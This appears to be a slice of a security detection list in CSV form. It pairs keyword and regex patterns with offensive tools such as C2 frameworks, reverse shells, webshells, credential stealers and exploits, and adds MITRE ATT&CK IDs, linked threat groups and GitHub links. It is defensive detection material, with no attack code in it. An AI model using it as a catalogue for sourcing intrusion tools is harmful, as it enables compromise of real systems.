"*FUD Payload Generator by Black$hell256*",".{0,1000}FUD\sPayload\sGenerator\sby\sBlack\$hell256.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#content","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","45391"
"*FudgeC2.*",".{0,1000}FudgeC2\..{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45392"
"*FudgeC2Persistence*",".{0,1000}FudgeC2Persistence.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45393"
"*FudgeC2Viewer.py*",".{0,1000}FudgeC2Viewer\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45394"
"*fuegoShell-bind>*",".{0,1000}fuegoShell\-bind\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45395"
"*Fuegoshell-client started*",".{0,1000}Fuegoshell\-client\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45396"
"*fuegoShell-reverse>*",".{0,1000}fuegoShell\-reverse\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45397"
"*Fuegoshell-server started*",".{0,1000}Fuegoshell\-server\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45398"
"*fuff *-input-shell*",".{0,1000}fuff\s.{0,1000}\-input\-shell.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","45399"
"*fuff *-scraperfile*",".{0,1000}fuff\s.{0,1000}\-scraperfile.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","45400"
"*fuff *-scrapers*",".{0,1000}fuff\s.{0,1000}\-scrapers.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","45401"
"*fugawi/EASSniper*",".{0,1000}fugawi\/EASSniper.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","45402"
"*Full url - ex https://hashcapture.com*",".{0,1000}Full\surl\s\-\sex\shttps\:\/\/hashcapture\.com.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","45403"
"*full; Wait-Process rundll32*",".{0,1000}full\;\sWait\-Process\srundll32.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","45404"
"*FULLSHADE/WindowsExploitationResources*",".{0,1000}FULLSHADE\/WindowsExploitationResources.{0,1000}","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","N/A","10","1569","322","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z","45405"
"*FullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn*",".{0,1000}FullyQualifiedAssemblyName\=0\;\\\\r\\\\nClrInstanceID\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","45406"
"*func decryptMalware(*",".{0,1000}func\sdecryptMalware\(.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","45407"
"*func_get_powershell_dll*",".{0,1000}func_get_powershell_dll.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","45408"
"*func_install_wine_dotnettojscript*",".{0,1000}func_install_wine_dotnettojscript.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","45409"
"*function actionBruteforce() {*",".{0,1000}function\sactionBruteforce\(\)\s\{.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45410"
"*function Amnesiac *",".{0,1000}function\sAmnesiac\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45411"
"*function Base64_Obfuscation*",".{0,1000}function\sBase64_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","45412"
"*function BXOR_Obfuscation*",".{0,1000}function\sBXOR_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","45413"
"*function Decrypt-RDCMan*",".{0,1000}function\sDecrypt\-RDCMan.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","45414"
"*function DumpSAM*",".{0,1000}function\sDumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","45415"
"*function Find-KeePassconfig*",".{0,1000}function\sFind\-KeePassconfig.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45416"
"*function Find-KeePassconfig*",".{0,1000}function\sFind\-KeePassconfig.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","45417"
"*function GNLPH*Get-ItemProperty ""HKLM:SAM\SAM\Domains\Account\Users\*",".{0,1000}function\sGNLPH.{0,1000}Get\-ItemProperty\s\""HKLM\:SAM\\SAM\\Domains\\Account\\Users\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","#registry","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","45418"
"*function HTTP-Backdoor-Logic*",".{0,1000}function\sHTTP\-Backdoor\-Logic.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45419"
"*function ImpersonateFromParentPid*",".{0,1000}function\sImpersonateFromParentPid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","45420"
"*function Invoke-SessionExec*",".{0,1000}\?function\sInvoke\-SessionExec.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","#content","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","45421"
"*function KematianLoader*",".{0,1000}function\sKematianLoader.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","45422"
"*Function list_localadmins()*",".{0,1000}Function\slist_localadmins\(\).{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","45423"
"*function Local:Get-KeePassINIFields*",".{0,1000}function\sLocal\:Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","45424"
"*function Local:Inject-RemoteShellcode *",".{0,1000}function\sLocal\:Inject\-RemoteShellcode\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","45425"
"*function Persistence_HTTP*",".{0,1000}function\sPersistence_HTTP.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45426"
"*function PrivEsc*",".{0,1000}function\sPrivEsc.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","45427"
"*function psenum*",".{0,1000}function\spsenum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45428"
"*Function PsMapExec*",".{0,1000}Function\sPsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","45429"
"*function Use-Zeus*",".{0,1000}function\sUse\-Zeus.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","45430"
"*FunnyWolf/pystinger*",".{0,1000}FunnyWolf\/pystinger.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","45431"
"*fuse_evil.*",".{0,1000}fuse_evil\..{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","45432"
"*fuse_lowlevel.h*",".{0,1000}fuse_lowlevel\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","45433"
"*fuxploider --url * --not-regex ""wrong file type""*",".{0,1000}fuxploider\s\-\-url\s.{0,1000}\s\-\-not\-regex\s\""wrong\sfile\stype\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45434"
"*fuxploider*",".{0,1000}fuxploider.{0,1000}","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/almandin/fuxploider","1","0","N/A","N/A","N/A","10","3188","511","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z","45435"
"*fuzz_option.pl*",".{0,1000}fuzz_option\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","45436"
"*fuzzdb*",".{0,1000}fuzzdb.{0,1000}","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","N/A","10","8493","2122","2023-11-10T16:15:18Z","2015-09-10T17:54:31Z","45437"
"*fuzzers/rippackets.pl*",".{0,1000}fuzzers\/rippackets\.pl.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","45438"
"*fuzzfactory.py*",".{0,1000}fuzzfactory\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45439"
"*fuzzrequest.py*",".{0,1000}fuzzrequest\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45440"
"*FuzzySecurity/Dendrobate*",".{0,1000}FuzzySecurity\/Dendrobate.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","45441"
"*FuzzySecurity/Sharp-Suite*",".{0,1000}FuzzySecurity\/Sharp\-Suite.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","45442"
"*FuzzySecurity/StandIn*",".{0,1000}FuzzySecurity\/StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","45443"
"*fw_walk disable*",".{0,1000}fw_walk\sdisable.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","45444"
"*g_hDesk = Funcs::pOpenDesktopA(g_desktopName*",".{0,1000}g_hDesk\s\=\sFuncs\:\:pOpenDesktopA\(g_desktopName.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","45445"
